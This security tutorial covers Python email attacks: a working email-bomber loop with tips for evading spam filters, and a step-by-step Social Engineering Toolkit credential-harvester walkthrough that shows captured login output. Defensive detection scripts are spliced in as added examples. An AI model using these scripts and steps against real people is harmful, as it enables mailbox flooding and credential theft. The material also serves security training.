Email-based attacks with Python: Phishing, email bombing and more

December 22, 2020 by Srinivas

The ability to send emails using an automated software tool such as a Python script can be useful in performing mass email-based phishing attacks. This article discusses how Python can be used to perform email-based attacks such as sending mass emails. In addition, we will discuss the Social Engineering Toolkit (SET), which is a tool written in Python.

Can Python-based tools be used for phishing?

Python is a scripting language with great community support. Because of this heavy community support, several offensive tools have been developed in Python. For the same reason, it is also easier to develop Python-based offensive tools, even for beginners. Phishing is no different. There are several Python-based tools developed for phishing attacks, and it is possible to send sophisticated phishing emails using Python. Social Engineering Toolkit (SET) by Sensepost is a great example of a Python-based phishing tool. The Social Engineering Toolkit comes preinstalled with Kali Linux, and we will discuss some of its features in a later section of this article.

What is a Python email sender?

A Python script that can send emails is generally termed a Python email sender. Python comes with great support for sending emails. Without requiring additional installations, we can use the built-in module available in its standard library for sending emails via SMTP.

The following line can be used to import the smtplib module which gives us the ability to send emails.

import smtplib

 

In all the examples in this article, we will use Gmail. By default, Google doesn't allow us to connect to a Gmail account to send emails, so the following step is required before proceeding further.

Access the following URL using the google account we want to send emails from.

https://myaccount.google.com/lesssecureapps

 

Enable the button as shown in the following figure.

Now, the following Python script can be used to send an email from this email id.

import smtplib

# Build a minimal message: a Subject header, a blank line, then the body
subject = 'Python Email'
body = 'This email is sent using python'
message = f'Subject: {subject}\n\n{body}'

# Connect to Gmail's SMTP service over implicit TLS
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
# Placeholders: replace the credentials and addresses with actual values
server.login("username", "password")
server.sendmail(
    "from email address",
    "to email address",
    message)
server.quit()

Just make sure that the highlighted fields are replaced with actual values. Running this script will send an email to the email address specified in the To field. In the following figure, we can verify that the email has been successfully delivered.

What is a Python email bomber?

According to Wikipedia, “an email bomb is a form of net abuse consisting of sending large volumes of email to an address in an attempt to overflow the mailbox, overwhelm the server where the email address is hosted in a denial-of-service attack (DoS attack) or as a smoke screen to distract the attention from important email messages indicating a security breach”.

A Python program that is capable of sending large volumes of emails to flood the victim is termed an email bomber. Writing a simple email bomber in Python is as simple as keeping the program shown earlier in a loop. While this is simple to develop, it is also simple to get caught by spam filters due to its simplicity. Because of this, we will need to employ various other techniques such as using time delay, sending from a trusted source, etc. to avoid detection.

The following script shows an example of a simple email bomb that sends 10 emails to the specified email address. The number in the while loop can be increased to send more emails, but this proves the point.

import smtplib

subject = 'Python Email'
body = 'This email is sent using python'
message = f'Subject: {subject}\n\n{body}'

server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
# Placeholders: replace the credentials and addresses with actual values
server.login("username", "password")

# Send the same message 10 times over one SMTP session
i = 1
while i < 11:
    server.sendmail(
        "from email address",
        "to email address",
        message)
    i += 1

server.quit()

Once the script is run, we can verify if the emails are delivered. 

As we can notice, the emails have been delivered successfully. In this case, the from and to emails are the same. But it works the same way even when they are different. 
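The remark above that such a loop is simple to catch can be made concrete from the receiving side. The following is an added example, not part of the original article: it flags a burst of identical messages to one mailbox using a sliding time window. The record layout, addresses, window and threshold are assumptions chosen for illustration, and the sample records are constructed.

```python
import hashlib
from collections import defaultdict, deque
from datetime import datetime, timedelta


def fingerprint(subject, body):
    """Hash of the normalised content, so identical copies share one key."""
    text = " ".join((subject + "\n" + body).lower().split())
    return hashlib.sha256(text.encode()).hexdigest()[:16]


def detect_floods(records, window=timedelta(seconds=60), threshold=5):
    """Alert when one recipient gets >= threshold identical messages in window.

    records: time-ordered (timestamp, sender, recipient, subject, body) tuples.
    """
    recent = defaultdict(deque)  # (recipient, content) -> timestamps in window
    alerts = {}
    for ts, sender, rcpt, subject, body in records:
        key = (rcpt.lower(), fingerprint(subject, body))
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop copies that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(key, {"recipient": key[0], "content": key[1],
                                        "peak": 0, "senders": set()})
            a["peak"] = max(a["peak"], len(q))
            a["senders"].add(sender.lower())
    return list(alerts.values())


def sample_records():
    """Constructed data: ten identical messages in ten seconds plus normal mail."""
    t0 = datetime(2020, 12, 20, 3, 0, 0)
    flood = [(t0 + timedelta(seconds=i), "sender@example.com",
              "victim@example.org", "Python Email",
              "This email is sent using python") for i in range(10)]
    normal = [(t0 + timedelta(minutes=5 * i), "hr@example.org",
               "victim@example.org", f"Weekly update {i}", "See attached notes")
              for i in range(3)]
    return sorted(flood + normal, key=lambda r: r[0])


if __name__ == "__main__":
    for alert in detect_floods(sample_records()):
        print(alert)
```

Widening `window` also catches copies that are spaced out with a time delay, at the cost of more false positives from legitimate repeated notifications.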

Python, phishing and social engineering (SET): understanding the risks

As mentioned earlier, the Social Engineering Toolkit is a useful toolset that can be used for phishing and social engineering attacks. This toolkit is completely written in Python and comes with a great set of features. Sending mass emails, phishing websites and payload creation are some of the features that are worth noting. Let us understand how SET can be used to conduct a simple phishing attack.

First, we can clone and install the Social Engineering Toolkit using the commands shown below.

git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py


Once the installation is successful, we can launch the toolkit using the command shown below.

# setoolkit

 

This will show the following menu.

Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1


Choosing 1 in the preceding menu will show the menu for Social-Engineering attacks, which looks as follows.

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 2


We are interested in setting up a phishing attack using a fake web form. So, choosing 2 in the preceding menu shows the options relevant to it.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack> 3


Within Website Attack vectors, there are several attacks possible. In this example, we will use the Credential Harvester Attack Method to grab credentials from victims using a fake login page. So, choose 3.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack> 1

We can choose existing Web Templates or clone a site. Let us choose option 1 to use a template that is available within SET. This will also pick the IP address for the POST back as shown below.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.110]: 

 

If this IP address is incorrectly picked, we can manually set one. The next step would be to choose a Website template from the list below.

  1. Java Required
  2. Google
  3. Twitter

set:webattack> Select a template: 3


In this case, we are choosing Twitter. Once done, everything will be set and we should be ready to send our link to the fake login page to the victims by various means such as sending emails.

[*] Cloning the website:
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:


When the victim visits the IP address (or the domain name), the following page appears.

If credentials are entered, they will be posted back in the SET console as highlighted below.

192.168.1.92 - - [20/Dec/2020 03:07:13] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=testuser
POSSIBLE PASSWORD FIELD FOUND: session[password]=hackmeifyoucan
PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52
PARAM: scribe_log=
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=
PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


The Social Engineering Toolkit is a powerful toolset for performing social engineering attacks. The powerful features it brings, along with its malicious payloads, are surely a danger if used maliciously. User education through internal phishing campaigns is one of the effective ways to prevent such attacks.
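Alongside user education, the walkthrough above leaves a recognisable trace: a fake login page served on port 80 from a bare IP address, followed by a form POST to that same address. The following is an added example, not part of the original article or of SET: it scans web proxy logs for that pattern and separates clients that submitted a form from those that only viewed the page. The log format and the sample lines are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed proxy log lines: "<time> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2020-12-20T03:07:13 192.168.1.92 GET http://192.168.1.110/ 200
2020-12-20T03:07:41 192.168.1.92 POST http://192.168.1.110/ 200
2020-12-20T03:08:02 192.168.1.93 POST https://login.example.com/session 200
2020-12-20T03:09:10 192.168.1.94 GET http://192.168.1.110/ 200
"""


def is_ip_literal(host):
    """True when the URL host is an IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_posts(log_text):
    """Find form POSTs over plain HTTP to an IP-literal host.

    Returns (findings, viewed_only): findings are clients that posted data and
    should have credentials reset; viewed_only are (client, host) pairs that
    loaded the page but never posted to it.
    """
    visited, findings = {}, []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines
        when, client, method, url, _status = parts
        u = urlsplit(url)
        if u.scheme != "http" or not u.hostname or not is_ip_literal(u.hostname):
            continue  # TLS sites and named hosts are out of scope for this rule
        if method == "GET":
            visited.setdefault(u.hostname, set()).add(client)
        elif method == "POST":
            findings.append({"time": when, "client": client, "host": u.hostname})
    submitted = {(f["client"], f["host"]) for f in findings}
    viewed_only = sorted((c, h) for h, cs in visited.items()
                         for c in cs if (c, h) not in submitted)
    return findings, viewed_only


if __name__ == "__main__":
    print(suspicious_posts(SAMPLE_LOG))
```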


Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds the Offensive Security Certified Professional (OSCP) certification. He blogs at www.androidpentesting.com. Email: srini0x00@gmail.com